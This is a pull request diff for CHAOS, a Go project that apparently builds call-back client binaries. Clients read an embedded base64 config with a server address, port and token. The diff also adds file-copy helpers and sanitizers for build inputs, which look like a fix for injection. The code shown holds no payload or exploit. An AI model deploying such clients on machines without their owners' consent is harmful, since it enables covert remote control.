Merge pull request #134 from tiagorlampert/security-improvements

Fix/Security improvements

client/app/utils/config.go

@@ -0,0 +1,28 @@
+package utils
+
+import (
+	"bytes"
+	"encoding/json"
+	"github.com/tiagorlampert/CHAOS/client/app/utils/encode"
+)
+
+type Config struct {
+	Port          string `json:"port"`
+	ServerAddress string `json:"server_address"`
+	Token         string `json:"token"`
+}
+
+func ReadConfigFile(configFile []byte) *Config {
+	decoded, err := encode.DecodeBase64(bytes.NewBuffer(configFile).String())
+	if err != nil {
+		panic(err)
+	}
+
+	configFile = bytes.NewBufferString(decoded).Bytes()
+
+	var config Config
+	if err := json.Unmarshal(configFile, &config); err != nil {
+		panic(err)
+	}
+	return &config
+}

client/app/utils/encode/encode.go

@@ -17,3 +17,11 @@ func PrettyJson(i interface{}) string {
 	s, _ := json.MarshalIndent(i, "", "\t")
 	return string(s)
 }
+
+func DecodeBase64(value string) (string, error) {
+	decoded, err := base64.StdEncoding.DecodeString(value)
+	if err != nil {
+		return "", err
+	}
+	return string(decoded), nil
+}

client/main.go

@@ -1,20 +1,24 @@
 package main
 
 import (
+	_ "embed"
 	"github.com/tiagorlampert/CHAOS/client/app"
 	"github.com/tiagorlampert/CHAOS/client/app/environment"
 	"github.com/tiagorlampert/CHAOS/client/app/ui"
+	"github.com/tiagorlampert/CHAOS/client/app/utils"
 )
 
 var (
-	Version       = "dev"
-	Port          = ""
-	ServerAddress = ""
-	Token         = ""
+	Version = "dev"
 )
 
+//go:embed config.json
+var configFile []byte
+
 func main() {
-	ui.ShowMenu(Version, ServerAddress, Port)
+	config := utils.ReadConfigFile(configFile)
+
+	ui.ShowMenu(Version, config.ServerAddress, config.Port)
 
-	app.New(environment.Load(ServerAddress, Port, Token)).Run()
+	app.New(environment.Load(config.ServerAddress, config.Port, config.Token)).Run()
 }

cmd/chaos/main.go

@@ -8,6 +8,7 @@ import (
 	"github.com/tiagorlampert/CHAOS/internal"
 	"github.com/tiagorlampert/CHAOS/internal/environment"
 	"github.com/tiagorlampert/CHAOS/internal/middleware"
+	"github.com/tiagorlampert/CHAOS/internal/utils"
 	"github.com/tiagorlampert/CHAOS/internal/utils/system"
 	"github.com/tiagorlampert/CHAOS/internal/utils/ui"
 	httpDelivery "github.com/tiagorlampert/CHAOS/presentation/http"
@@ -110,7 +111,7 @@ func NewApp(logger *logrus.Logger, configuration *environment.Configuration, dbC
 }
 
 func Setup() error {
-	return system.CreateDirs(internal.TempDirectory, internal.DatabaseDirectory)
+	return utils.CreateDirs(internal.TempDirectory, internal.DatabaseDirectory)
 }
 
 func (a *App) Run() error {

internal/utils/copy.go

@@ -0,0 +1,136 @@
+package utils
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+)
+
+//https://gist.github.com/r0l1/92462b38df26839a3ca324697c8cba04
+
+/* MIT License
+ *
+ * Copyright (c) 2017 Roland Singer [[email protected]]
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+// CopyFile copies the contents of the file named src to the file named
+// by dst. The file will be created if it does not already exist. If the
+// destination file exists, all it's contents will be replaced by the contents
+// of the source file. The file mode will be copied from the source and
+// the copied data is synced/flushed to stable storage.
+func CopyFile(src, dst string) (err error) {
+	in, err := os.Open(src)
+	if err != nil {
+		return
+	}
+	defer in.Close()
+
+	out, err := os.Create(dst)
+	if err != nil {
+		return
+	}
+	defer func() {
+		if e := out.Close(); e != nil {
+			err = e
+		}
+	}()
+
+	_, err = io.Copy(out, in)
+	if err != nil {
+		return
+	}
+
+	err = out.Sync()
+	if err != nil {
+		return
+	}
+
+	si, err := os.Stat(src)
+	if err != nil {
+		return
+	}
+	err = os.Chmod(dst, si.Mode())
+	if err != nil {
+		return
+	}
+
+	return
+}
+
+// CopyDir recursively copies a directory tree, attempting to preserve permissions.
+// Source directory must exist, destination directory must *not* exist.
+// Symlinks are ignored and skipped.
+func CopyDir(src string, dst string) (err error) {
+	src = filepath.Clean(src)
+	dst = filepath.Clean(dst)
+
+	si, err := os.Stat(src)
+	if err != nil {
+		return err
+	}
+	if !si.IsDir() {
+		return fmt.Errorf("source is not a directory")
+	}
+
+	_, err = os.Stat(dst)
+	if err != nil && !os.IsNotExist(err) {
+		return
+	}
+	if err == nil {
+		return fmt.Errorf("destination already exists")
+	}
+
+	err = os.MkdirAll(dst, si.Mode())
+	if err != nil {
+		return
+	}
+
+	entries, err := ioutil.ReadDir(src)
+	if err != nil {
+		return
+	}
+
+	for _, entry := range entries {
+		srcPath := filepath.Join(src, entry.Name())
+		dstPath := filepath.Join(dst, entry.Name())
+
+		if entry.IsDir() {
+			err = CopyDir(srcPath, dstPath)
+			if err != nil {
+				return
+			}
+		} else {
+			// Skip symlinks.
+			if entry.Mode()&os.ModeSymlink != 0 {
+				continue
+			}
+
+			err = CopyFile(srcPath, dstPath)
+			if err != nil {
+				return
+			}
+		}
+	}
+
+	return
+}

internal/utils/system/directory.go → internal/utils/directory.go

@@ -1,4 +1,4 @@
-package system
+package utils
 
 import "os"
 
@@ -18,3 +18,7 @@ func createDirectory(path string) error {
 	}
 	return nil
 }
+
+func RemoveDir(path string) error {
+	return os.RemoveAll(path)
+}

internal/utils/file.go

@@ -0,0 +1,14 @@
+package utils
+
+import "os"
+
+func WriteFile(filepath string, s []byte) error {
+	f, err := os.Create(filepath)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	_, err = f.Write(s)
+	return err
+}

internal/utils/strings.go

@@ -2,13 +2,17 @@ package utils
 
 import (
 	"regexp"
-	"strings"
 )
 
-func NormalizeString(s string) (string, error) {
-	re, err := regexp.Compile(`\W`)
-	if err != nil {
-		return "", err
-	}
-	return strings.TrimSpace(re.ReplaceAllString(s, "")), nil
+func SanitizeString(s string) string {
+	return replace(s, `\W`)
+}
+
+func SanitizeUrl(s string) string {
+	return replace(s, `[^a-zA-Z0-9-_/:.,?&@=#%]`)
+}
+
+func replace(s string, r string) string {
+	re := regexp.MustCompile(r)
+	return string(re.ReplaceAll([]byte(s), []byte("")))
 }

services/client/client.go

@@ -3,6 +3,7 @@ package client
 import (
 	"context"
 	"github.com/gorilla/websocket"
+	"github.com/tiagorlampert/CHAOS/internal/utils"
 	"github.com/tiagorlampert/CHAOS/internal/utils/system"
 )
 
@@ -23,6 +24,18 @@ type BuildClientBinaryInput struct {
 	OSTarget                            system.OSType
 }
 
+func (b BuildClientBinaryInput) GetServerAddress() string {
+	return utils.SanitizeUrl(b.ServerAddress)
+}
+
+func (b BuildClientBinaryInput) GetServerPort() string {
+	return utils.SanitizeUrl(b.ServerPort)
+}
+
+func (b BuildClientBinaryInput) GetFilename() string {
+	return utils.SanitizeString(b.Filename)
+}
+
 type Service interface {
 	AddConnection(clientID string, connection *websocket.Conn) error
 	GetConnection(clientID string) (*websocket.Conn, bool)